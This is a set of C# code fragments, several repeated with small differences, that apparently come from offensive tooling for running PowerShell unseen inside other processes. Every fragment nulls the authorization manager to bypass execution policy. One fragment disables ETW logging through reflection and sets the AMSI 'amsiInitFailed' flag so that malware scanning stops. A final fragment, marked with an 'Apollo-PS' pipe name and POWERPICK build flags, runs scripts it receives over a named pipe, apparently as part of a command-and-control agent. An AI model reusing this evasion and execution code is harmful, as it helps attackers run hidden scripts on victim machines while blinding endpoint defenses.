public static string InvokeScript(string command, bool useLocalScope) { CustomPSHost host = new CustomPSHost(); InitialSessionState state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; // Bypass PowerShell execution policy using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { pipeline.Commands.AddScript(command, useLocalScope); pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add("out-default"); pipeline.Invoke(); } } string output = ((CustomPSHostUserInterface)host.UI).Output; return(output); }
public static string InvokePS(string command) { // I had to implement a custom PSHost in order to get Write-Host to work. // This wouldn't be an issue if all PowerShell scripts used Write-Output // instead of Write-Host, but enough use Write-Host that it's worth it // to implement a custom PSHost CustomPSHost host = new CustomPSHost(); var state = InitialSessionState.CreateDefault(); state.ApartmentState = ApartmentState.STA; // STA so we can do fun stuff like token impersonation easier state.AuthorizationManager = null; // Bypass PowerShell execution policy using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { pipeline.Commands.AddScript(command); pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add("out-default"); pipeline.Invoke(); } } string output = ((CustomPSHostUserInterface)host.UI).Output; return(output); }
public static string InvokePS(string command) { // I had to implement a custom PSHost in order to get Write-Host to work. // This wouldn't be an issue if all PowerShell scripts used Write-Output // instead of Write-Host, but enough use Write-Host that it's worth it // to implement a custom PSHost CustomPSHost host = new CustomPSHost(); var state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; // Bypass PowerShell execution policy using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { pipeline.Commands.AddScript(command); pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add("out-default"); pipeline.Invoke(); } } string output = ((CustomPSHostUserInterface)host.UI).Output; return output; }
private Harness() { this.host = new CustomPSHost(this); this.state = InitialSessionState.CreateDefault(); this.state.AuthorizationManager = null; this.myRunSpace = RunspaceFactory.CreateRunspace(this.host, this.state); this.myRunSpace.ThreadOptions = PSThreadOptions.UseCurrentThread; this.myRunSpace.Open(); }
public Runner() { _state = InitialSessionState.CreateDefault(); _state.AuthorizationManager = null; _host = new CustomPSHost(); _runspace = RunspaceFactory.CreateRunspace(_host, _state); _runspace.Open(); }
public Runner(string id) { _id = id; _state = InitialSessionState.CreateDefault(); _state.AuthorizationManager = null; _host = new CustomPSHost(); _runspace = RunspaceFactory.CreateRunspace(_host, _state); _runspace.Open(); }
public PowerShellRunner() { PSHost = new CustomPSHost(); var state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; // Bypass PowerShell execution policy state.LanguageMode = PSLanguageMode.FullLanguage; // lol? Runspace = RunspaceFactory.CreateRunspace(PSHost, state); Runspace.Open(); Pipeline = Runspace.CreatePipeline(); }
internal Runner(string id) { _id = id; _state = InitialSessionState.CreateDefault(); _state.AuthorizationManager = null; _host = new CustomPSHost(); _runspace = RunspaceFactory.CreateRunspace(_host, _state); _runspace.Open(); // add support straight up for the existing scripts foreach (var script in Scripts.GetAllScripts()) { Execute(script); } }
public static string InvokePS(string command) { // I had to implement a custom PSHost in order to get Write-Host to work. // This wouldn't be an issue if all PowerShell scripts used Write-Output // instead of Write-Host, but enough use Write-Host that it's worth it // to implement a custom PSHost CustomPSHost host = new CustomPSHost(); var state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; // Bypass PowerShell execution policy using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); EtwProvider.SetValue(null, EventProvider); var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); pipeline.Commands.AddScript(command); pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add("out-default"); pipeline.Invoke(); } } string output = ((CustomPSHostUserInterface)host.UI).Output; return(output); }
public static string InvokeCommand(string command, bool isScript, bool useLocalScope, string[] parameterNames, object parameterValue) { ArrayList parameterValues = (parameterValue as ArrayList); CustomPSHost host = new CustomPSHost(); InitialSessionState state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; // Bypass PowerShell execution policy using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { Command scriptCommand = new Command(command, isScript, useLocalScope); for (int i = 0; i < parameterNames.Length; i++) { if (i < parameterValues.Count) { scriptCommand.Parameters.Add(parameterNames[i], parameterValues[i]); } else { scriptCommand.Parameters.Add(parameterNames[i]); } } scriptCommand.MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add(scriptCommand); pipeline.Commands.Add("out-default"); pipeline.Invoke(); } } return(((CustomPSHostUserInterface)host.UI).Output); }
public static void InitializeNamedPipeServer(string pipeName) { //var pipeName = "Apollo-PS"; bf.Binder = new PowerShellJobMessageBinder(); NamedPipeServerStream pipeServer = null; try { pipeServer = CreateNamedPipeServer(pipeName); } catch (Exception e) { Console.WriteLine("ERROR: Could not start named pipe server. " + e.Message); } if (pipeServer == null) { KillJob(JobExitCode.PipeStartError); } PowerShellJobMessage newJob = null; try { // We shouldn't need to go async here since we'll only have one client, the agent core, and it'll maintain the connection to the named pipe until the job is done pipeServer.WaitForConnection(); newJob = ReadJob(pipeServer); } catch (Exception e) { Console.WriteLine("ERROR: Could not read powershell from named pipe. " + e.Message); pipeServer.Close(); return; } // Create new named pipe with task ID as name // This ensures that we don't collide with other jobs that might try to use this pipe name if (newJob == null) { KillJob(JobExitCode.AssemblyReadError); } using (StreamWriter writer = new StreamWriter(pipeServer)) { writer.AutoFlush = true; // commented out for powerpick testing #if !POWERPICK var origStdout = Console.Out; var origStderr = Console.Error; Console.SetOut(writer); Console.SetError(writer); #endif try { CustomPSHost host = new CustomPSHost(); InitialSessionState state = InitialSessionState.CreateDefault(); state.AuthorizationManager = null; using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state)) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { pipeline.Commands.AddScript(newJob.LoadedScript); pipeline.Commands.AddScript(newJob.Command); pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output); pipeline.Commands.Add("Out-Default"); pipeline.Invoke(); } } } catch (Exception e) { Console.WriteLine("ERROR: Unhandled exception in the PowerShellRunner: {0}\n{1}", e.Message, e.StackTrace); //Console.WriteLine(e); } finally { // for powerpick. #if POWERPICK bf.Serialize(pipeServer, new PowerShellTerminatedMessage() { Message = "Finished execution." }); #else // commented out for powerpick // Restore streams... probably don't need to do this but meh Console.SetOut(origStdout); Console.SetError(origStderr); #endif } pipeServer.WaitForPipeDrain(); } //Console.WriteLine("Waiting for output to be read completely..."); //Console.WriteLine("Exiting loader stub..."); }